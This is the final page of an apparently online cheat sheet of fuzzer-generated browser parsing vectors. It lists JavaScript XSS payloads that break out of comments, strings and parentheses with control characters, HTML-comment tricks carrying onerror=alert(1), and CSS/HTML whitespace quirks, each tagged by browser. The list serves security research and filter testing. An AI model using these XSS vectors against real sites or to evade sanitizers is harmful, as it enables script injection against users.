Cheat Sheet

Generated payloads from fuzz test results. Filter by type, category, or browser.

Found 169 vectors with results

// 
alert(10)

Source: Characters that can break out of a single line comment

Author: 0x999-x

JSXSS ExecutionChromeFirefoxSafari

// 0x0Dalert(13)

Source: Characters that can break out of a single line comment

Author: 0x999-x

JSXSS ExecutionChromeFirefoxSafari

//  alert(8232)

Source: Characters that can break out of a single line comment

Author: 0x999-x

JSXSS ExecutionChromeFirefoxSafari

//  alert(8233)

Source: Characters that can break out of a single line comment

Author: 0x999-x

JSXSS ExecutionChromeFirefoxSafari

<div style=0x09color:red⟦09⟧></div>

Source: Characters that act as quotes or whitespace

Author: hackvertor

HTMLCSS ParsingChromeFirefoxSafari

<div style=
color:red
></div>

Source: Characters that act as quotes or whitespace

Author: hackvertor

HTMLCSS ParsingChromeFirefoxSafari

<div style=0x0Ccolor:red⟦0C⟧></div>

Source: Characters that act as quotes or whitespace

Author: hackvertor

HTMLCSS ParsingChromeFirefoxSafari

<div style=0x0Dcolor:red⟦0D⟧></div>

Source: Characters that act as quotes or whitespace

Author: hackvertor

HTMLCSS ParsingChromeFirefoxSafari

<div style= color:red ></div>

Source: Characters that act as quotes or whitespace

Author: hackvertor

HTMLCSS ParsingChromeFirefoxSafari

<!----!><img/src/onerror=alert(1)>

Source: HTML comment before greater than

Author: hackvertor

HTMLHTML ParsingChromeFirefoxSafari

<!-----><img/src/onerror=alert(1)>

Source: HTML comment before greater than

Author: hackvertor

HTMLHTML ParsingChromeFirefoxSafari

<!---->><img/src/onerror=alert(1)>

Source: HTML comment before greater than

Author: hackvertor

HTMLHTML ParsingChromeFirefoxSafari

""
alert(10)

Source: Characters after strings

Author: hackvertor

JSXSS ExecutionChromeFirefoxSafari

""0x0Dalert(13)

Source: Characters after strings

Author: hackvertor

JSXSS ExecutionChromeFirefoxSafari

""%alert(37)

Source: Characters after strings

Author: hackvertor

JSXSS ExecutionChromeFirefoxSafari

""&alert(38)

Source: Characters after strings

Author: hackvertor

JSXSS ExecutionChromeFirefoxSafari

""*alert(42)

Source: Characters after strings

Author: hackvertor

JSXSS ExecutionChromeFirefoxSafari

alert(10)

sdfasdfasfasfd

Source: Characters that act like new line or single line comment

Author: hackvertor

JSXSS ExecutionChromeSafariFirefox

alert(13)0x0D0x0Dsdfasdfasfasfd

Source: Characters that act like new line or single line comment

Author: hackvertor

JSXSS ExecutionChromeSafariFirefox

alert(38)&&sdfasdfasfasfd

Source: Characters that act like new line or single line comment

Author: hackvertor

JSXSS ExecutionChromeSafariFirefox

alert(42)**sdfasdfasfasfd

Source: Characters that act like new line or single line comment

Author: hackvertor

JSXSS ExecutionChromeSafariFirefox

alert(47)//sdfasdfasfasfd

Source: Characters that act like new line or single line comment

Author: hackvertor

JSXSS ExecutionChromeSafariFirefox

alert0x09(9)

Source: Characters allowed before parentheses

Author: hackvertor

JSXSS ExecutionChromeFirefoxSafari

alert
(10)

Source: Characters allowed before parentheses

Author: hackvertor

JSXSS ExecutionChromeFirefoxSafari

alert0x0B(11)

Source: Characters allowed before parentheses

Author: hackvertor

JSXSS ExecutionChromeFirefoxSafari

alert0x0C(12)

Source: Characters allowed before parentheses

Author: hackvertor

JSXSS ExecutionChromeFirefoxSafari

alert0x0D(13)

Source: Characters allowed before parentheses

Author: hackvertor

JSXSS ExecutionChromeFirefoxSafari

alert(9)⟦09⟧

Source: Characters allowed after parentheses

Author: hackvertor

JSXSS ExecutionChromeFirefoxSafari

alert(10)

Source: Characters allowed after parentheses

Author: hackvertor

JSXSS ExecutionChromeFirefoxSafari

alert(11)0x0B

Source: Characters allowed after parentheses

Author: hackvertor

JSXSS ExecutionChromeFirefoxSafari

alert(12)0x0C

Source: Characters allowed after parentheses

Author: hackvertor

JSXSS ExecutionChromeFirefoxSafari

alert(13)0x0D

Source: Characters allowed after parentheses

Author: hackvertor

JSXSS ExecutionChromeFirefoxSafari

console.alert()
alert(10)

Source: JavaScript separators between function names

Author: InsertScript

JSXSS ExecutionChromeFirefoxSafari

console.alert()0x0Dalert(13)

Source: JavaScript separators between function names

Author: InsertScript

JSXSS ExecutionChromeFirefoxSafari

console.alert()%alert(37)

Source: JavaScript separators between function names

Author: InsertScript

JSXSS ExecutionChromeFirefoxSafari

console.alert()&alert(38)

Source: JavaScript separators between function names

Author: InsertScript

JSXSS ExecutionChromeFirefoxSafari

console.alert()*alert(42)

Source: JavaScript separators between function names

Author: InsertScript

JSXSS ExecutionChromeFirefoxSafari

<found0x09>

Source: Characters between element name and >

Author: ThomasOrlita

HTMLHTML ParsingChromeSafari

<found
>

Source: Characters between element name and >

Author: ThomasOrlita

HTMLHTML ParsingChromeSafari

<found0x0C>

Source: Characters between element name and >

Author: ThomasOrlita

HTMLHTML ParsingChromeSafari

<found0x0D>

Source: Characters between element name and >

Author: ThomasOrlita

HTMLHTML ParsingChromeSafari

<found >

Source: Characters between element name and >

Author: ThomasOrlita

HTMLHTML ParsingChromeSafari

Page 9 of 9

« Prev

Cheat Sheet

Distributed Fuzzing